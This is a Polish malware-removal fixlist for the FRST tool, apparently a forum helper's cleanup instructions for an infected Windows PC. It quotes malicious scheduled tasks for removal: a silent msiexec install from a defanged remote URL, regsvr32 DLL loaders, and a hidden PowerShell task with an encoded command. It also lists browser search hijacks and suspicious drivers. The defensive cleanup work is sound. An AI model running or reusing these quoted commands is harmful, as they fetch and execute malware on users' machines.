
Otwórz notatnik systemowy i wklej:

HKU\S-1-5-21-1393165460-243477947-2800629209-1000\...\ChromeHTML: -> "C:\Program Files\Eastness\Application\chrome.exe" "%1" <==== UWAGA
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
Task: {0000CAEE-BA36-4AED-8C47-0C7820405B91} - System32\Tasks\{0E544DB1-B9FF-FA1A-015B-F66C2572319A} => C:\ProgramData\{6B877452-DC2C-C3F9-F0E9-11513284F7B5}\218A4816-9621-FFBD-561D-973665502ACF.exe [2017-05-04] () <==== UWAGA
Task: {297223C1-884D-4154-8530-B378C095F36E} - System32\Tasks\{08DCB6D5-BF77-017E-57AD-A0F9C5DA80AC} => C:\ProgramData\{2051A677-97FA-11DC-AB72-2E7165FD0627}\A3AFF046-1404-47ED-39DE-100B5DD43BF7.exe [2017-05-04] () <==== UWAGA
Task: {5D73430C-D73E-4F66-B72C-E69D58C14F7C} - System32\Tasks\Tirationaneberse => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST9160411ASG_5TG1CE4CXXXX5TG1CE4C&v=201722 /q <==== UWAGA
Task: {859D9D6E-0A90-4924-A037-A9E681F306D3} - System32\Tasks\{0979B2ED-58AF-4DB1-848D-26FFA0939AD4} => C:\Windows\system32\pcalua.exe -a "C:\Users\Ja\Downloads\FIFA_Manager_12_Free_Full_Version_Game [1].exe" -d C:\Users\Ja\Downloads
Task: {8E3780B7-17A0-47E1-A546-B654C06F3786} - System32\Tasks\{0412CA95-B3B9-7D3E-916F-6A64F294CA8D} => C:\ProgramData\{15B80175-A213-B6DE-5ADC-DB6B3465FA74}\07CD52D9-B066-E572-B4C7-C4E0C5908799.exe [2017-05-04] () <==== UWAGA
Task: {A3900F8B-798C-4019-9883-0286470019E9} - System32\Tasks\{22E2F65C-6175-8ACE-EB7D-4267B008732F} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~2\57612869\596df20f.dll" <==== UWAGA
Task: {C0566BFE-66EF-4FAC-BD3C-41B1AB14F840} - System32\Tasks\SMW_UpdateTask_Time_3638373037353238372d2d37505a2a6c55326c342341 => wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== UWAGA
Task: {DA43372F-E5D9-4FE5-89C5-A6E1C6E148C9} - System32\Tasks\CD144EF0-EBE0-8690-1080-FF42C0880B4C => C:\Windows\system32\regsvr32.exe /n /s /i:"/02d02391816f39c5 /q" "C:\Users\Ja\AppData\Local\2ACBAE~1\{596DF~1."
Task: {F2402448-60F9-495B-BAB6-1F6960D5FA10} - System32\Tasks\{DBC7F7A1-2700-4670-933E-1DC1D8153D2D} => C:\Users\Ja\Downloads\Gry\LeagueofLegends_EUNE_Installer_2016_11_10 (1).exe
Task: {F6EFB0AC-B7C7-4038-87E2-30B85AD53143} - System32\Tasks\{1CBB9B44-75C2-4D32-9803-AC670903AF55} => C:\Riot Games\League of Legends\LeagueClient.exe [2017-12-14] ()
Task: {FB93235B-07B4-4365-B2A7-B7A34C8C7780} - System32\Tasks\{244BB31B-692D-62D7-3AF8-C144EAE28F00} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~2\57612869\596df20f.dll" <==== UWAGA
Task: {FD2A4DB2-76CF-4252-BAAD-B1C25C135AC8} - System32\Tasks\{08080E47-7E7E-0D0F-7E11-0A050E78110A} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgADsAOwA7ACAAIAAgACAAIAAgADsAIAA7ACAAOwA7ACAAIAAgADsAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4A (dane wartości zawierają 9740 znaków więcej). <==== UWAGA
ShortcutWithArgument: C:\Users\Ja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h1szamobl20488au,787d078b-ae6f-4ca2-9640-05aeebc03dbe,
ShortcutWithArgument: C:\Users\Ja\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\7eacadfa43776aec\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h1szamobl20488au,787d078b-ae6f-4ca2-9640-05aeebc03dbe,
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-1393165460-243477947-2800629209-1000\...\Run: [background_fault] => C:\Users\Ja\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-06] (AVAST Software) <==== UWAGA
HKLM\...\Providers\81bd26iq: C:\Program Files\Terbaent Center\local32spl.dll [275968 2017-02-02] () <==== UWAGA
ShellExecuteHooks: Brak nazwy - {1215881A-DE48-11E6-9639-64006A5CFC23} -  -> Brak pliku
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-1393165460-243477947-2800629209-1000\Software\Microsoft\Internet Explorer\Main,Start Page = 
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-1393165460-243477947-2800629209-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.amisites.com/search/?type=ds&ts=1486390482&z=ce8d94c3d21d39fbe6fc238gazfbeq7c0t1ebz4b4g&from=che0812&uid=ST9160411ASG_5TG1CE4CXXXX5TG1CE4C&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1393165460-243477947-2800629209-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.amisites.com/search/?type=ds&ts=1486390482&z=ce8d94c3d21d39fbe6fc238gazfbeq7c0t1ebz4b4g&from=che0812&uid=ST9160411ASG_5TG1CE4CXXXX5TG1CE4C&q={searchTerms}
CHR Profile: C:\Users\Ja\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2 [2018-01-06] <==== UWAGA
R2 MS_CHECK_SVC; C:\ProgramData\Microsoft\DeviceSync\LocalBackup.dll [487424 2017-02-08] () [Brak podpisu cyfrowego] <==== UWAGA
S2 ed2kidle; "C:\Program Files\amuleCe\ed2k.exe" -downloadwhenidle [X]
U0 aswVmm; Brak ImagePath
S1 iSafeKrnl; \??\C:\Program Files\Elex-tech\YAC\iSafeKrnl.sys [X] <==== UWAGA
S1 iSafeKrnlKit; \??\C:\Program Files\Elex-tech\YAC\iSafeKrnlKit.sys [X] <==== UWAGA
S1 iSafeKrnlMon; \??\C:\Program Files\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== UWAGA
S1 iSafeKrnlR3; \??\C:\Program Files\Elex-tech\YAC\iSafeKrnlR3.sys [X] <==== UWAGA
2018-01-06 18:17 - 2018-01-06 18:26 - 000000000 ____D C:\AdwCleaner
C:\Users\Ja\AppData\Local\background_fault\aswRD.exe
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze. 
Uruchom jako administrator FRST i kliknij w Fix/Napraw.
Przeskanuj progr. Malwarebytes Anti-Malware http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/